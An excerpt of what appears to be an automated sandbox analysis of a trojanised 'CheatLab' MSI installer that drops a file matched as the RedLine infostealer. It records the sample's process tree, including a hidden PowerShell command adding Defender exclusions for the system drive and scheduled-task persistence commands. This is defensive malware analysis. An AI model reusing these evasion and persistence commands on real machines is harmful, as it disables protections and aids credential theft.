                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE50837417_2_00007FF6DE508374
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE52C47C17_2_00007FF6DE52C47C
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE4F453017_2_00007FF6DE4F4530
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE5204E817_2_00007FF6DE5204E8
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE50C4CC17_2_00007FF6DE50C4CC
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE4A229017_2_00007FF6DE4A2290
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE5282B017_2_00007FF6DE5282B0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0040205022_2_00402050
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0040987722_2_00409877
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0040909722_2_00409097
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_004189C522_2_004189C5
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0040225022_2_00402250
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_00419B4522_2_00419B45
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0040A33022_2_0040A330
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_00408BC222_2_00408BC2
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0041ABF122_2_0041ABF1
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0041944D22_2_0041944D
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0040946B22_2_0040946B
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_00409C9722_2_00409C97
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0040F75622_2_0040F756
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_00418F0922_2_00418F09
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0242084822_2_02420848
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0242140F22_2_0242140F
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0250044822_2_02500448
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0252004022_2_02520040
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0252809822_2_02528098
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0252AB9822_2_0252AB98
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0252BCF122_2_0252BCF1
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_025222C622_2_025222C6
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0252232222_2_02522322
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0252D11A22_2_0252D11A
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_02526B3222_2_02526B32
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_02525F9722_2_02525F97
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0783145822_2_07831458
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07831E0822_2_07831E08
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07831E1822_2_07831E18
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07A8D20F22_2_07A8D20F
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07A8DBF022_2_07A8DBF0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07A8084822_2_07A80848
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07A8510022_2_07A85100
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07AA599022_2_07AA5990
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07AA043822_2_07AA0438
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07AA044822_2_07AA0448
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07ACB6B022_2_07ACB6B0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07AC96C822_2_07AC96C8
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07AC766022_2_07AC7660
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07ACB16B22_2_07ACB16B
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07AC692822_2_07AC6928
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07AF575022_2_07AF5750
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07AFE5B022_2_07AFE5B0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07AF63BF22_2_07AF63BF
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07AFC32822_2_07AFC328
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07AF4FD022_2_07AF4FD0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07AF980C22_2_07AF980C
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07AF980C22_2_07AF980C
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07AF980C22_2_07AF980C
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07B41C3022_2_07B41C30
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07B447C022_2_07B447C0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07C5778022_2_07C57780
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07C593D822_2_07C593D8
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07C5530022_2_07C55300
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07C50EA022_2_07C50EA0
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07C54A3022_2_07C54A30
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07C546E822_2_07C546E8
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07C5861D22_2_07C5861D
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07C50E9122_2_07C50E91
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_089EB28822_2_089EB288
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_089EA53022_2_089EA530
                    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\MSI8FE.tmp 426E6CF199A8268E8A7763EC3A4DD7ADD982B28C51D89EBEA90CA792CBAE14DD
                    Source: 22.2.connect.exe.21f0000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: 22.2.connect.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
                    Source: C:\Windows\System32\msiexec.exeFile deleted: C:\Windows\Installer\MSIF35B.tmpJump to behavior
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Windows\Installer\6cf1b5.msiJump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: String function: 00603292 appears 66 times
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: String function: 0060325F appears 103 times
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: String function: 00603790 appears 39 times
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: String function: 004024E0 appears 67 times
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: String function: 0040FD1C appears 47 times
                    Source: Cheat.Lab.2.7.1.msiBinary or memory string: OriginalFilenameviewer.exeF vs Cheat.Lab.2.7.1.msi
                    Source: Cheat.Lab.2.7.1.msiBinary or memory string: OriginalFilenameAICustAct.dllF vs Cheat.Lab.2.7.1.msi
                    Source: Cheat.Lab.2.7.1.msiBinary or memory string: OriginalFilenameSoftwareDetector.dllF vs Cheat.Lab.2.7.1.msi
                    Source: Cheat.Lab.2.7.1.msiBinary or memory string: OriginalFilenameaischeduler.dllF vs Cheat.Lab.2.7.1.msi
                    Source: connect.exe.9.drStatic PE information: Section: .reloc IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\DNMPTNU2.htmJump to behavior
                    Source: classification engineClassification label: mal76.troj.spyw.evad.winMSI@30/48@2/4
                    Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF7723C88E0 GetLastError,FormatMessageA,11_2_00007FF7723C88E0
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_005E45B0 LoadResource,LockResource,SizeofResource,5_2_005E45B0
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Program Files\CheatLab CorpJump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat"
                    Source: C:\Windows\Installer\MSIF5A3.tmpKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: unknownProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\Cheat.Lab.2.7.1.msi"
                    Source: unknownProcess created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
                    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5E03ED5AB1478F6152C3A4AE0716FC8E C
                    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F39516897EEA46074340BE595843CEF6
                    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3B80CDA5B5BAFA68ED05607E689893EE E Global\MSI0000
                    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIF5A3.tmp C:\Windows\Installer\MSIF5A3.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat
                    Source: C:\Windows\Installer\MSIF5A3.tmpProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"
                    Source: unknownProcess created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua
                    Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:57 /f /tn ServerUpdate_NzEx /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua""
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:57 /f /tn "LuaJIT" /tr ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua""
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: unknownProcess created: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua
                    Source: unknownProcess created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua
                    Source: unknownProcess created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeProcess created: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 5E03ED5AB1478F6152C3A4AE0716FC8E CJump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding F39516897EEA46074340BE595843CEF6Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3B80CDA5B5BAFA68ED05607E689893EE E Global\MSI0000Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\Installer\MSIF5A3.tmp C:\Windows\Installer\MSIF5A3.tmp" /EnforcedRunAsAdmin /RunAsAdmin /HideWindow "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.batJump to behavior
                    Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.luaJump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\System32\cmd.exe" /C ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.bat" Jump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"Jump to behavior
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:57 /f /tn ServerUpdate_NzEx /tr ""C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exe" "C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\CheatLab.lua""Jump to behavior
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /create /sc daily /st 12:57 /f /tn "LuaJIT" /tr ""C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exe" "C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.lua""Jump to behavior
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeProcess created: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exe C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeJump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process Where SessionId='1'
                    Source: C:\Windows\System32\msiexec.exeFile created: C:\Users\user\AppData\Local\Temp\MSID42B.tmpJump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_005E4BA0 CoInitialize,CoCreateInstance,VariantInit,VariantClear,IUnknown_QueryService,CoAllowSetForegroundWindow,SysAllocString,SysAllocString,SysAllocString,SysAllocString,VariantInit,OpenProcess,WaitForSingleObject,GetExitCodeProcess,CloseHandle,LocalFree,VariantClear,VariantClear,VariantClear,VariantClear,VariantClear,SysFreeString,VariantClear,CoUninitialize,_com_issue_error,5_2_005E4BA0
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dllJump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_005E3860 CreateToolhelp32Snapshot,CloseHandle,Process32FirstW,OpenProcess,CloseHandle,Process32NextW,CloseHandle,5_2_005E3860
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeMutant created: \Sessions\1\BaseNamedObjects\Sun711
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7752:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3168:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5312:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7776:120:WilError_03
                    Source: C:\Windows\System32\msiexec.exeAutomated click: Next >
                    Source: C:\Windows\System32\msiexec.exeAutomated click: Install
                    Source: C:\Windows\SysWOW64\msiexec.exeAutomated click: OK
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab CorpJump to behavior
                    Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1Jump to behavior
                    Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\CheatLab.luaJump to behavior
                    Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeJump to behavior
                    Source: C:\Windows\System32\msiexec.exeDirectory created: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\exclusion.batJump to behavior
                    Source: Cheat.Lab.2.7.1.msiStatic file information: File size 2820608 > 1048576
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb: source: MSIF5A3.tmp, 00000005.00000000.1734572937.0000000000627000.00000002.00000001.01000000.00000003.sdmp, MSIF5A3.tmp, 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmp, Cheat.Lab.2.7.1.msi, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF5A3.tmp.1.dr
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdbb source: Cheat.Lab.2.7.1.msi, 6cf1b5.msi.1.dr, MSID5C6.tmp.0.dr
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\SoftwareDetector.pdb source: Cheat.Lab.2.7.1.msi, 6cf1b5.msi.1.dr, MSID5C6.tmp.0.dr
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdb source: Cheat.Lab.2.7.1.msi, MSID538.tmp.0.dr, MSI91F.tmp.0.dr, MSID4A9.tmp.0.dr, MSID605.tmp.0.dr, MSI8FE.tmp.0.dr, MSID4E9.tmp.0.dr, MSID4C9.tmp.0.dr, MSIF3EA.tmp.1.dr, MSIF35B.tmp.1.dr, MSIF3BA.tmp.1.dr, 6cf1b5.msi.1.dr, MSIFEEB.tmp.1.dr, MSID626.tmp.0.dr, MSID42B.tmp.0.dr
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\AICustAct.pdbn source: Cheat.Lab.2.7.1.msi, MSID538.tmp.0.dr, MSI91F.tmp.0.dr, MSID4A9.tmp.0.dr, MSID605.tmp.0.dr, MSI8FE.tmp.0.dr, MSID4E9.tmp.0.dr, MSID4C9.tmp.0.dr, MSIF3EA.tmp.1.dr, MSIF35B.tmp.1.dr, MSIF3BA.tmp.1.dr, 6cf1b5.msi.1.dr, MSIFEEB.tmp.1.dr, MSID626.tmp.0.dr, MSID42B.tmp.0.dr
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\viewer.pdb source: MSIF5A3.tmp, 00000005.00000000.1734572937.0000000000627000.00000002.00000001.01000000.00000003.sdmp, MSIF5A3.tmp, 00000005.00000002.1756905993.0000000000627000.00000002.00000001.01000000.00000003.sdmp, Cheat.Lab.2.7.1.msi, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF5A3.tmp.1.dr
                    Source: Binary string: C:\JobRelease\win\Release\custact\x86\aischeduler2.pdb source: Cheat.Lab.2.7.1.msi, 6cf1b6.rbs.1.dr, MSIF458.tmp.1.dr, 6cf1b5.msi.1.dr, MSIF459.tmp.1.dr, MSIF4F6.tmp.1.dr

                    Data Obfuscation

                    barindex
                    Suspicious powershell command line found
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"
                    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath $env:SystemDrive -ExclusionExtension .exe, .dll -Force"Jump to behavior
                    Source: C:\Windows\Installer\MSIF5A3.tmpCode function: 5_2_0060323C push ecx; ret 5_2_0060324F
                    Source: C:\Program Files\CheatLab Corp\CheatLab 2.7.1\LuaJIT.exeCode function: 11_2_00007FF77238499C push rbp; ret 11_2_00007FF7723849D8
                    Source: C:\ProgramData\OWYsN2YsN2YsYTAsOWUsODYsOGMsOTYsNjQsN2Ms\NzEx.exeCode function: 17_2_00007FF6DE45499C push rbp; ret 17_2_00007FF6DE4549D8
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0040A888 push ecx; ret 22_2_0040A89B
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0041E140 push eax; ret 22_2_0041E167
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0040FD61 push ecx; ret 22_2_0040FD74
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0040AFEE push dword ptr [ecx-75h]; iretd 22_2_0040AFFB
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_024242B4 push ebx; ret 22_2_024242DA
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0252AB3D pushad ; ret 22_2_0252AB3E
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07837AB2 push dword ptr [ecx+ecx-75h]; iretd 22_2_07837AC2
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07AF2EFC push esp; retf 22_2_07AF2F01
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07C56610 push esp; retf 22_2_07C56611
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_07C56630 pushad ; retf 22_2_07C56639
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_086B47C0 push eax; ret 22_2_086B47C1
                    Source: C:\Users\user\AppData\Roaming\Discord\Settings\connect.exeCode function: 22_2_0041C000 VirtualAlloc,LoadLibraryA,GetProcAddress,GetProcAddress,VirtualProtect,lstrlenW,CreateThread,Sleep,WaitForSingleObject,22_2_0041C000
                    Source: LuaJIT.exe.1.drStatic PE information: section name: _RDATA
                    Source: NzEx.exe.9.drStatic PE information: section name: _RDATA
                    Source: connect.exe.9.drStatic PE information: section name: .qbjfz
                    Source: LuaJIT.exe.1.drStatic PE information: real checksum: 0x124374 should be: 0x12438e
                    Source: NzEx.exe.9.drStatic PE information: real checksum: 0x124374 should be: 0x12438e

                    Persistence and Installation Behavior

                    barindex
                    Drops executables to the windows directory (C:\Windows) and starts them
                    Source: C:\Windows\System32\msiexec.exeExecutable created and started: C:\Windows\Installer\MSIF5A3.tmpJump to behavior
